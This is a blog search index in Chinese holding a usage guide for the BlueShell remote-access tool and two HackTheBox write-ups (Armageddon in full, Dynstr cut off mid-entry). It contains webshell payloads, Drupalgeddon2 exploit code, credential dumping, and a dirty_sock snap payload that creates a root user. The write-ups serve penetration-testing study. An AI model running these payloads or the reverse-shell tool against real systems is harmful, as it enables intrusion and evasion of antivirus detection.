search.xml

<?xml version="1.0" encoding="utf-8"?>
<search>
  <entry>
    <title>BlueShell</title>
    <url>/2022/02/28/BlueShell/</url>
    <content><![CDATA[<h1 id="BlueShell"><a href="#BlueShell" class="headerlink" title="BlueShell"></a>BlueShell</h1><p>BlueShell是一款Go语言编写的远控工具</p>
<span id="more"></span>

<p>项目地址：<a href="https://github.com/whitehatnote/BlueShell">https://github.com/whitehatnote/BlueShell</a></p>
<h2 id="安装"><a href="#安装" class="headerlink" title="安装"></a>安装</h2><p>安装依赖包</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">go get github.com/armon/go-socks5</span><br><span class="line">go get github.com/creack/pty</span><br><span class="line">go get github.com/hashicorp/yamux</span><br><span class="line">go get github.com/djimenez/iconv-go</span><br><span class="line">go get golang.org/x/crypto/ssh/terminal</span><br></pre></td></tr></table></figure>

<h3 id="错误及解决方法"><a href="#错误及解决方法" class="headerlink" title="错误及解决方法"></a>错误及解决方法</h3><h4 id="go-get请求超时"><a href="#go-get请求超时" class="headerlink" title="go get请求超时"></a><code>go get</code>请求超时</h4><p>设置代理可以</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">go env -w GO111MODULE=on</span><br><span class="line">//这个默认是&quot;&quot;</span><br><span class="line">go env -w GOPROXY=https://goproxy.cn,direct</span><br><span class="line">或</span><br><span class="line">go env -w GOPROXY=https://goproxy.io,direct</span><br></pre></td></tr></table></figure>

<h4 id="cannot-find-package"><a href="#cannot-find-package" class="headerlink" title="cannot find package"></a>cannot find package</h4><p>在BlueShell目录打开终端</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">go mod init BlueShell</span><br><span class="line">go mod tidy</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220228150927067.png" alt="image-20220228150927067"></p>
<p><code>client.go</code>中<code>./shell</code>是报错的原因，修改为<code>BlueShell/shell</code>（不要用相对路径）</p>
<h3 id="生成Client-Server"><a href="#生成Client-Server" class="headerlink" title="生成Client/Server"></a>生成Client/Server</h3><h4 id="Linux-MacOS"><a href="#Linux-MacOS" class="headerlink" title="Linux/MacOS"></a>Linux/MacOS</h4><figure class="highlight go"><table><tr><td class="code"><pre><span class="line"><span class="keyword">go</span> build --ldflags <span class="string">&quot;-s -w &quot;</span> -o bsClient client.<span class="keyword">go</span> <span class="comment">//生成client</span></span><br><span class="line"><span class="keyword">go</span> build --ldflags <span class="string">&quot;-s -w &quot;</span> -o bsServer server.<span class="keyword">go</span> <span class="comment">//生成server</span></span><br></pre></td></tr></table></figure>

<h4 id="Windows"><a href="#Windows" class="headerlink" title="Windows"></a>Windows</h4><figure class="highlight go"><table><tr><td class="code"><pre><span class="line"><span class="keyword">go</span> build --ldflags <span class="string">&quot;-s -w -H=windowsgui&quot;</span> -o bsClient.exe client.<span class="keyword">go</span></span><br></pre></td></tr></table></figure>

<h2 id="使用"><a href="#使用" class="headerlink" title="使用"></a>使用</h2><blockquote>
<p>参数</p>
<p>-h 指定Server-IP地址</p>
<p>-p 指定监听端口，默认8081</p>
<p>-t 尝试连接Server间隔时间</p>
<p>-a 指定功能：shell/socks/upload/download</p>
<p>-suser socks代理账号，默认blue</p>
<p>-spass socks代理密码，默认Blueshell@2020</p>
<p>-sport socks监听端口，默认7777</p>
<p>-lpath 需要上传的本地文件路径</p>
<p>-ldir 存放下载文件的本地路径</p>
<p>-rpath 需要下载的文件地址</p>
<p>-rdir 上传的目标目录</p>
<p>-rencode 指定编码类型</p>
</blockquote>
<h3 id="Client"><a href="#Client" class="headerlink" title="Client"></a>Client</h3><h4 id="Windows-1"><a href="#Windows-1" class="headerlink" title="Windows"></a>Windows</h4><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">start /b bsClient.exe -h 192.168.221.128 -p 443 -t 10</span><br></pre></td></tr></table></figure>



<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220228155440521.png" alt="image-20220228155440521"></p>
<h4 id="Linux-MacOS-1"><a href="#Linux-MacOS-1" class="headerlink" title="Linux/MacOS"></a>Linux/MacOS</h4><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">nohup bsClient -h 10.0.0.1 -p 443 &amp;</span><br></pre></td></tr></table></figure>

<h3 id="Server"><a href="#Server" class="headerlink" title="Server"></a>Server</h3><h4 id="反弹shell"><a href="#反弹shell" class="headerlink" title="反弹shell"></a>反弹shell</h4><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">./bsServer -p 443 -a shell [-rencode gb2312] //[]解决Windows乱码问题</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220228155909586.png" alt="image-20220228155909586"></p>
<h4 id="反弹Socks5代理"><a href="#反弹Socks5代理" class="headerlink" title="反弹Socks5代理"></a>反弹Socks5代理</h4><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">./bsServer -p 443 -a socks -sport 7778 -suser socksUser -spass socksPassword</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/bluesocks.png" alt="bluesocks"></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220228182917346.png" alt="image-20220228182917346"></p>
<h4 id="文件上传"><a href="#文件上传" class="headerlink" title="文件上传"></a>文件上传</h4><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">./bsServer -a upload -lpath /tmp/tmp.txt -rdir c:\\</span><br></pre></td></tr></table></figure>

<h4 id="文件下载"><a href="#文件下载" class="headerlink" title="文件下载"></a>文件下载</h4><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">./bsServer -a download -rpath c:\\tmp.txt -ldir /tmp</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220228184354001.png" alt="image-20220228184354001"></p>
<h2 id="小结"><a href="#小结" class="headerlink" title="小结"></a>小结</h2><p>体量小功能强，可以进行二次开发或者结合免杀使用，在不免杀的情况下会被杀软查杀</p>
]]></content>
      <tags>
        <tag>渗透测试</tag>
        <tag>工具</tag>
      </tags>
  </entry>
  <entry>
    <title>Hackthebox-Armageddon</title>
    <url>/2022/01/07/HackTheBox-Armageddon/</url>
    <content><![CDATA[<h1 id="Hackthebox-Armageddon"><a href="#Hackthebox-Armageddon" class="headerlink" title="Hackthebox-Armageddon"></a>Hackthebox-Armageddon</h1><p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/Armg_pwn.png" alt="pwn"></p>
<span id="more"></span>

<blockquote>
<p>目标IP：10.10.10.233</p>
<p>本机IP：10.10.14.209</p>
</blockquote>
<h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h2><p><strong>nmap</strong></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/Armageddon_nmap.png" alt="nmap"></p>
<p>开放了22、80端口</p>
<p>打开Burpsuite，配置好代理（个人习惯，F12一样的）</p>
<p>直接访问看下网站功能</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/webserver.png" alt="webserver"></p>
<p>没什么特别的功能，注册一个账号试试</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/failregister.png" alt="failregister"></p>
<p>输入账号邮箱以后密码发到邮箱里，但这个功能应该是假的，没有收到任何邮件</p>
<p>简单尝试了一下似乎也没有sql注入</p>
<p><strong>Dirsearch</strong></p>
<p>扫了一下网站目录，发现了<code>robots.txt</code>、<code>shell.php</code>等</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/dirsearch.png" alt="dirsearch"></p>
<p>查看下<code>robots.txt</code>里面都有什么</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">User-agent: *</span><br><span class="line">Crawl-delay: 10</span><br><span class="line"># CSS, JS, Images</span><br><span class="line">Allow: /misc/*.css$</span><br><span class="line">Allow: /misc/*.css?</span><br><span class="line">Allow: /misc/*.js$</span><br><span class="line">Allow: /misc/*.js?</span><br><span class="line">Allow: /misc/*.gif</span><br><span class="line">Allow: /misc/*.jpg</span><br><span class="line">Allow: /misc/*.jpeg</span><br><span class="line">Allow: /misc/*.png</span><br><span class="line">Allow: /modules/*.css$</span><br><span class="line">Allow: /modules/*.css?</span><br><span class="line">Allow: /modules/*.js$</span><br><span class="line">Allow: /modules/*.js?</span><br><span class="line">Allow: /modules/*.gif</span><br><span class="line">Allow: /modules/*.jpg</span><br><span class="line">Allow: /modules/*.jpeg</span><br><span class="line">Allow: /modules/*.png</span><br><span class="line">Allow: /profiles/*.css$</span><br><span class="line">Allow: /profiles/*.css?</span><br><span class="line">Allow: /profiles/*.js$</span><br><span class="line">Allow: /profiles/*.js?</span><br><span class="line">Allow: /profiles/*.gif</span><br><span class="line">Allow: /profiles/*.jpg</span><br><span class="line">Allow: /profiles/*.jpeg</span><br><span class="line">Allow: /profiles/*.png</span><br><span class="line">Allow: /themes/*.css$</span><br><span class="line">Allow: /themes/*.css?</span><br><span class="line">Allow: /themes/*.js$</span><br><span class="line">Allow: /themes/*.js?</span><br><span class="line">Allow: /themes/*.gif</span><br><span class="line">Allow: /themes/*.jpg</span><br><span class="line">Allow: /themes/*.jpeg</span><br><span class="line">Allow: /themes/*.png</span><br><span class="line"># Directories</span><br><span class="line">Disallow: /includes/</span><br><span class="line">Disallow: /misc/</span><br><span class="line">Disallow: /modules/</span><br><span class="line">Disallow: /profiles/</span><br><span class="line">Disallow: /scripts/</span><br><span class="line">Disallow: /themes/</span><br><span class="line"># Files</span><br><span class="line">Disallow: /CHANGELOG.txt</span><br><span class="line">Disallow: /cron.php</span><br><span class="line">Disallow: /INSTALL.mysql.txt</span><br><span class="line">Disallow: /INSTALL.pgsql.txt</span><br><span class="line">Disallow: /INSTALL.sqlite.txt</span><br><span class="line">Disallow: /install.php</span><br><span class="line">Disallow: /INSTALL.txt</span><br><span class="line">Disallow: /LICENSE.txt</span><br><span class="line">Disallow: /MAINTAINERS.txt</span><br><span class="line">Disallow: /update.php</span><br><span class="line">Disallow: /UPGRADE.txt</span><br><span class="line">Disallow: /xmlrpc.php</span><br><span class="line"># Paths (clean URLs)</span><br><span class="line">Disallow: /admin/</span><br><span class="line">Disallow: /comment/reply/</span><br><span class="line">Disallow: /filter/tips/</span><br><span class="line">Disallow: /node/add/</span><br><span class="line">Disallow: /search/</span><br><span class="line">Disallow: /user/register/</span><br><span class="line">Disallow: /user/password/</span><br><span class="line">Disallow: /user/login/</span><br><span class="line">Disallow: /user/logout/</span><br><span class="line"># Paths (no clean URLs)</span><br><span class="line">Disallow: /?q=admin/</span><br><span class="line">Disallow: /?q=comment/reply/</span><br><span class="line">Disallow: /?q=filter/tips/</span><br><span class="line">Disallow: /?q=node/add/</span><br><span class="line">Disallow: /?q=search/</span><br><span class="line">Disallow: /?q=user/password/</span><br><span class="line">Disallow: /?q=user/register/</span><br><span class="line">Disallow: /?q=user/login/</span><br><span class="line">Disallow: /?q=user/logout/</span><br></pre></td></tr></table></figure>

<p>网站居然没有任何限制，可以直接看目录</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/%E7%9B%AE%E5%BD%95.png" alt="目录"></p>
<p>几个目录都翻烂了也没啥有用的信息</p>
<p>在更新日志(/CHANGELOG.txt)里发现了重要信息</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/changelog.png" alt="changelog"></p>
<p>从更新日志里可以看到，网站最后更新的Drupal 7.56</p>
<p>Google上搜了一波得知Drupal 7.56爆出过远程代码执行漏洞，影响范围<strong>Drupal &lt; 7.58 / &lt; 8.3.9 / &lt; 8.4.6 / &lt; 8.5.1</strong></p>
<h2 id="Drupal远程代码执行漏洞利用"><a href="#Drupal远程代码执行漏洞利用" class="headerlink" title="Drupal远程代码执行漏洞利用"></a>Drupal远程代码执行漏洞利用</h2><p>详情可搜CVE：2018-7600，分析文章已经很多了不多赘述（Exp在参考链接）</p>
<h3 id="方法一"><a href="#方法一" class="headerlink" title="方法一"></a>方法一</h3><p><strong>–部分Drupalgeddon2代码–</strong></p>
<figure class="highlight ruby"><table><tr><td class="code"><pre><span class="line"><span class="comment"># Settings - Try to write a PHP to the web root?</span></span><br><span class="line">try_phpshell = <span class="literal">true</span></span><br><span class="line"><span class="comment"># Settings - General/Stealth</span></span><br><span class="line"><span class="variable">$useragent</span> = <span class="string">&quot;drupalgeddon2&quot;</span></span><br><span class="line">webshell = <span class="string">&quot;shell.php&quot;</span></span><br><span class="line"><span class="comment"># Settings - Proxy information (nil to disable)</span></span><br><span class="line"><span class="variable">$proxy_addr</span> = <span class="literal">nil</span></span><br><span class="line"><span class="variable">$proxy_port</span> = <span class="number">8080</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment"># Settings - Payload (we could just be happy without this PHP shell, by using just the OS shell - but this is &#x27;better&#x27;!)</span></span><br><span class="line">bashcmd = <span class="string">&quot;&lt;?php if( isset( $_REQUEST[&#x27;c&#x27;] ) ) &#123; system( $_REQUEST[&#x27;c&#x27;] . &#x27; 2&gt;&amp;1&#x27; ); &#125;&quot;</span></span><br><span class="line">bashcmd = <span class="string">&quot;echo &quot;</span> + Base64.strict_encode64(bashcmd) + <span class="string">&quot; | base64 -d&quot;</span></span><br></pre></td></tr></table></figure>

<p>上面Dirsearch扫描发现就有个<code>shell.php</code>，应该是别的gamer在做靶机的时候写进来的，尝试下果然</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/shellphp.png" alt="shellphp"></p>
<p>利用<code>shell.php</code>入自己的一句话并用蚁剑连接(想弹个shell出来发现弹不出来，可能姿势不对)</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">echo PD9waHAgZXZhbCgkX1BPU1RbY21kXSk7Pz4K|base64 -d &gt;jasontt.php</span><br></pre></td></tr></table></figure>

<p>蚁剑成功连接</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/%E8%9A%81%E5%89%91.png" alt="蚁剑"></p>
<p>根目录下没有user.txt，那应该不在当前用户下</p>
<p>终于<code>/var/www/html/sites/default/settings.php</code>里发现了数据库的用户名密码</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/settings.png" alt="settings"></p>
<pre><code>  &#39;username&#39; =&gt; &#39;drupaluser&#39;,
  &#39;password&#39; =&gt; &#39;CQHEy@9M*m23gBVj&#39;,
</code></pre>
<p>接下来利用找到的数据库账号密码从数据库中找到有用的信息</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">mysql -u drupaluser -pCQHEy@9M*m23gBVj -e &#x27;show databases;&#x27;</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/databases.png" alt="databases"></p>
<p>查看<code>drupal</code>中有哪些表</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">mysql -u drupaluser -pCQHEy@9M*m23gBVj -D drupal -e &#x27;show tables;&#x27;</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">Tables_in_drupal</span><br><span class="line">actions</span><br><span class="line">authmap</span><br><span class="line">batch</span><br><span class="line">block</span><br><span class="line">block_custom</span><br><span class="line">block_node_type</span><br><span class="line">block_role</span><br><span class="line">blocked_ips</span><br><span class="line">cache</span><br><span class="line">cache_block</span><br><span class="line">cache_bootstrap</span><br><span class="line">cache_field</span><br><span class="line">cache_filter</span><br><span class="line">cache_form</span><br><span class="line">cache_image</span><br><span class="line">cache_menu</span><br><span class="line">cache_page</span><br><span class="line">cache_path</span><br><span class="line">comment</span><br><span class="line">date_format_locale</span><br><span class="line">date_format_type</span><br><span class="line">date_formats</span><br><span class="line">field_config</span><br><span class="line">field_config_instance</span><br><span class="line">field_data_body</span><br><span class="line">field_data_comment_body</span><br><span class="line">field_data_field_image</span><br><span class="line">field_data_field_tags</span><br><span class="line">field_revision_body</span><br><span class="line">field_revision_comment_body</span><br><span class="line">field_revision_field_image</span><br><span class="line">field_revision_field_tags</span><br><span class="line">file_managed</span><br><span class="line">file_usage</span><br><span class="line">filter</span><br><span class="line">filter_format</span><br><span class="line">flood</span><br><span class="line">history</span><br><span class="line">image_effects</span><br><span class="line">image_styles</span><br><span class="line">menu_custom</span><br><span class="line">menu_links</span><br><span class="line">menu_router</span><br><span class="line">node</span><br><span class="line">node_access</span><br><span class="line">node_comment_statistics</span><br><span class="line">node_revision</span><br><span class="line">node_type</span><br><span class="line">queue</span><br><span class="line">rdf_mapping</span><br><span class="line">registry</span><br><span class="line">registry_file</span><br><span class="line">role</span><br><span class="line">role_permission</span><br><span class="line">search_dataset</span><br><span class="line">search_index</span><br><span class="line">search_node_links</span><br><span class="line">search_total</span><br><span class="line">semaphore</span><br><span class="line">sequences</span><br><span class="line">sessions</span><br><span class="line">shortcut_set</span><br><span class="line">shortcut_set_users</span><br><span class="line">system</span><br><span class="line">taxonomy_index</span><br><span class="line">taxonomy_term_data</span><br><span class="line">taxonomy_term_hierarchy</span><br><span class="line">taxonomy_vocabulary</span><br><span class="line">url_alias</span><br><span class="line">users</span><br><span class="line">users_roles</span><br><span class="line">variable</span><br><span class="line">watchdog</span><br></pre></td></tr></table></figure>

<p>查看<code>users</code>表中有哪些字段</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">mysql -u drupaluser -pCQHEy@9M*m23gBVj -D drupal -e &#x27;desc users;&#x27;</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/desctables.png" alt="desctables"></p>
<p><strong>name</strong>和<strong>pass</strong>应该就是账号密码了，查看一下</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">mysql -u drupaluser -pCQHEy@9M*m23gBVj -D drupal -e &#x27;select name,pass from users;&#x27;</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/userpwd.png" alt="userpwd"></p>
<h3 id="方法二"><a href="#方法二" class="headerlink" title="方法二"></a>方法二</h3><p>除了利用网上找到的Exp也可以使用工具Metasploit</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/msf1.png" alt="msf1"></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/msf2.png" alt="msf2"></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/msf3.png" alt="msf3"></p>
<p>getshell以后操作和方法一差不多就不继续写了，可以参考上面的。</p>
<h2 id="密码破解"><a href="#密码破解" class="headerlink" title="密码破解"></a>密码破解</h2><p>在数据库里得到了brucetherealadmin用户的账号密码</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">brucetherealadmin   $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt</span><br></pre></td></tr></table></figure>

<p>密码应该是hash加密过了，用Kali里自带的工具<code>john the ripper</code>破解</p>
<p>新建一个txt文档存放密码，john命令如下：</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">john hash.txt -w /usr/share/wordlists/rockyou.txt</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/johnpass.png" alt="johnpass"></p>
<p>得到密码为<code>booboo</code></p>
<p>尝试刚得到的用户名密码<code>SSH</code>，连接成功</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/sshuser.png" alt="sshuser"></p>
<p>user.txt在<code>~</code>目录下</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/userflag.png" alt="userflag"></p>
<h2 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h2><p>用<code>sudo -l</code>查看用户的权限</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/usersudo.png" alt="usersudo"></p>
<p>直接google搜索<code>(root) NOPASSWD: /usr/bin/snap install *</code></p>
<p>得到有用的信息<a href="https://github.com/initstring/dirty_sock/">dirty_sock:Linux提权漏洞</a>（snap漏洞分析参考链接2）</p>
<blockquote>
<p>2019年1月，由于默认安装的服务snapd API中的一个bug，通过默认安装的Ubuntu Linux被发现存在特权提升漏洞，任何本地用户都可以利用此漏洞直接获取root权限。</p>
</blockquote>
<p>通过<code>python --version</code>发现本地是python2，本台靶机用<code>dirty_sockv2.py</code>中的一部分就可以提权了</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/dirtysock.png" alt="dirtysock"></p>
<p>snap本身运行在沙箱环境中，exp通过snap的开发模式（“devmode”）来降低限制条件，从而像主机上的其他应用一样来访问主机。snap还引入了“hooks”机制，“install hook”会在snap安装时运行，如果snap配置为开发模式，hook将会在root上下文中运行</p>
<p>脚本作用就是添加了一个<code>dirty_sock</code>用户可以提权到root</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">python2 -c &#x27;print &quot;aHNxcwcAAAAQIVZcAAACAAAAAAAEABEA0AIBAAQAAADgAAAAAAAAAI4DAAAAAAAAhgMAAAAAAAD//////////xICAAAAAAAAsAIAAAAAAAA+AwAAAAAAAHgDAAAAAAAAIyEvYmluL2Jhc2gKCnVzZXJhZGQgZGlydHlfc29jayAtbSAtcCAnJDYkc1daY1cxdDI1cGZVZEJ1WCRqV2pFWlFGMnpGU2Z5R3k5TGJ2RzN2Rnp6SFJqWGZCWUswU09HZk1EMXNMeWFTOTdBd25KVXM3Z0RDWS5mZzE5TnMzSndSZERoT2NFbURwQlZsRjltLicgLXMgL2Jpbi9iYXNoCnVzZXJtb2QgLWFHIHN1ZG8gZGlydHlfc29jawplY2hvICJkaXJ0eV9zb2NrICAgIEFMTD0oQUxMOkFMTCkgQUxMIiA+PiAvZXRjL3N1ZG9lcnMKbmFtZTogZGlydHktc29jawp2ZXJzaW9uOiAnMC4xJwpzdW1tYXJ5OiBFbXB0eSBzbmFwLCB1c2VkIGZvciBleHBsb2l0CmRlc2NyaXB0aW9uOiAnU2VlIGh0dHBzOi8vZ2l0aHViLmNvbS9pbml0c3RyaW5nL2RpcnR5X3NvY2sKCiAgJwphcmNoaXRlY3R1cmVzOgotIGFtZDY0CmNvbmZpbmVtZW50OiBkZXZtb2RlCmdyYWRlOiBkZXZlbAqcAP03elhaAAABaSLeNgPAZIACIQECAAAAADopyIngAP8AXF0ABIAerFoU8J/e5+qumvhFkbY5Pr4ba1mk4+lgZFHaUvoa1O5k6KmvF3FqfKH62aluxOVeNQ7Z00lddaUjrkpxz0ET/XVLOZmGVXmojv/IHq2fZcc/VQCcVtsco6gAw76gWAABeIACAAAAaCPLPz4wDYsCAAAAAAFZWowA/Td6WFoAAAFpIt42A8BTnQEhAQIAAAAAvhLn0OAAnABLXQAAan87Em73BrVRGmIBM8q2XR9JLRjNEyz6lNkCjEjKrZZFBdDja9cJJGw1F0vtkyjZecTuAfMJX82806GjaLtEv4x1DNYWJ5N5RQAAAEDvGfMAAWedAQAAAPtvjkc+MA2LAgAAAAABWVo4gIAAAAAAAAAAPAAAAAAAAAAAAAAAAAAAAFwAAAAAAAAAwAAAAAAAAACgAAAAAAAAAOAAAAAAAAAAPgMAAAAAAAAEgAAAAACAAw&quot; + &quot;A&quot;*4256 + &quot;==&quot;&#x27; | base64 -d &gt; jasontt.snap</span><br></pre></td></tr></table></figure>

<p>安装jasont.snap</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">sudo /user/bin/snap install --devmode jasontt.snap</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/snap.png" alt="snap"></p>
<p>用<code>cat /etc/passwd</code>看看<code>dirty_sock</code>用户有没有添加成功</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/adduser.png" alt="adduser"></p>
<p>用户添加成功了，我们用<code>su</code>命令切换到<code>sock_dirty</code>用户，密码同用户名</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/drty_sock.png" alt="drty_sock"></p>
<p>得到root权限，拿到root.txt</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/root.png" alt="root"></p>
<h2 id="参考链接"><a href="#参考链接" class="headerlink" title="参考链接"></a>参考链接</h2><p><a href="https://www.exploit-db.com/exploits/44449">https://www.exploit-db.com/exploits/44449</a></p>
<p><a href="https://initblog.com/2019/dirty-sock/">https://initblog.com/2019/dirty-sock/</a></p>
<p><a href="https://github.com/initstring/dirty_sock">https://github.com/initstring/dirty_sock</a></p>
]]></content>
      <tags>
        <tag>渗透测试</tag>
        <tag>HackTheBox</tag>
      </tags>
  </entry>
  <entry>
    <title>HackTheBox-Dynstr</title>
    <url>/2022/01/07/HackTheBox-Dynstr/</url>
    <content><![CDATA[<h1 id="HackTheBox-Dynstr"><a href="#HackTheBox-Dynstr" class="headerlink" title="HackTheBox-Dynstr"></a>HackTheBox-Dynstr</h1><p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/dynstr_pwn.png" alt="pwn"></p>
<span id="more"></span>

<blockquote>
<p>本机IP：10.10.16.3</p>
<p>目标IP：10.10.10.244</p>
</blockquote>
<h2 id="写在前面"><a href="#写在前面" class="headerlink" title="写在前面"></a>写在前面</h2><p>这台靶机难度中上，由于涉及的知识点是我的盲区，所以花了两天时间才拿下，赶紧记录一下。整个做下来感觉学到了不少，围绕着DDNS为主题设计的靶机，能学的知识有DNS区域、动态DNS更新工具nsupdate的使用、如何在linux中安装和配置DNS服务器、利用通配符进行Linux提权等</p>
<h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h2><h3 id="前期搜集"><a href="#前期搜集" class="headerlink" title="前期搜集"></a>前期搜集</h3><p><strong>nmap</strong></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/dynstr_nmap.png" alt="nmap"></p>
<p>扫描端口开放了22、53、80端口</p>
<p>先从80端口下手看网站提供了哪些功能和信息</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/web%E4%BF%A1%E6%81%AF.png" alt="web信息"></p>
<p>似乎是一个提供动态DNS服务的网站，并给出了服务的域：</p>
<blockquote>
<p>dnsalias.htb</p>
<p>dynamicdns.htb</p>
<p>no-ip.htb</p>
<p>dyna.htb(由网页底部<a href="mailto:&#100;&#x6e;&#x73;&#x40;&#x64;&#121;&#110;&#x61;&#x2e;&#x68;&#x74;&#x62;">&#100;&#x6e;&#x73;&#x40;&#x64;&#121;&#110;&#x61;&#x2e;&#x68;&#x74;&#x62;</a>获得)</p>
</blockquote>
<p>Beta中说网站正在测试模式下运行，并提供了共享凭据：</p>
<blockquote>
<p>Username: dynadns</p>
<p>Password: sndanyd</p>
</blockquote>
<p>把上述域名加入<code>/etc/hosts</code></p>
<p><strong>gobuster</strong></p>
<p>网站暂时提供的信息就这么多，用<strong>gobuster</strong>爆破一下网站目录</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">gobuster dir -u http://dyna.htb -w /usr/share/wordlists/dirb/big.txt -t 200 --wildcard</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/gobuster%E5%8F%91%E7%8E%B0nic.png" alt="gobuster发现nic"></p>
<p>找到<code>/nic</code>，但是访问<code>/nic</code>发现是空白页</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/%E7%A9%BAnic.png" alt="空nic"></p>
<p>尝试继续爆破/nic发现<code>/.htpasswd</code>、<code>/.htaccess</code>、<code>/update</code></p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">gobuster dir -u http://dyna.htb/nic -w /usr/share/wordlists/dirb/big.txt -t 200 --wildcard</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/gobuster%E5%8F%91%E7%8E%B0update.png" alt="gobuster发现update"></p>
<p>访问前两者<strong>403</strong> ，在<code>/update</code>有所发现，报了一个<strong>badauth</strong></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/badauth.png" alt="badauth"></p>
<p>上面获得了共享凭据但是现在不知道哪里可以用，这个页面肯定是有问题的，但是不知道它是如何判断<strong>badauth</strong>的，卡住</p>
<h3 id="找到突破口"><a href="#找到突破口" class="headerlink" title="找到突破口"></a>找到突破口</h3><p>通过Google搜索发现了一些有用的东西</p>
<p>在搜索dynadns时，发现了<code>www.dynu.com</code>，这是一个免费提供动态DNS服务供应商,站内搜索badauth得到如下<a href="https://www.dynu.com/Forum/ViewTopic/badauth-being-received/439">帖子</a>，从问题回答者的回帖中发现<code>/nic/update</code>后面传了几个参数，应该就是通过参数的内容来判断<strong>badauth</strong>与否，开始我们获得了一个用户名、密码、邮箱等信息，但和文章中提到的参数还是有点初入，简单尝试发现还是行不通。</p>
<p>又去搜<code>/nic/update</code>，找到了关于no-ip动态dns发送更新的一篇<a href="https://www.noip.com/integrate/request">说明</a></p>
<p>一个基本的发送更新请求的样例：</p>
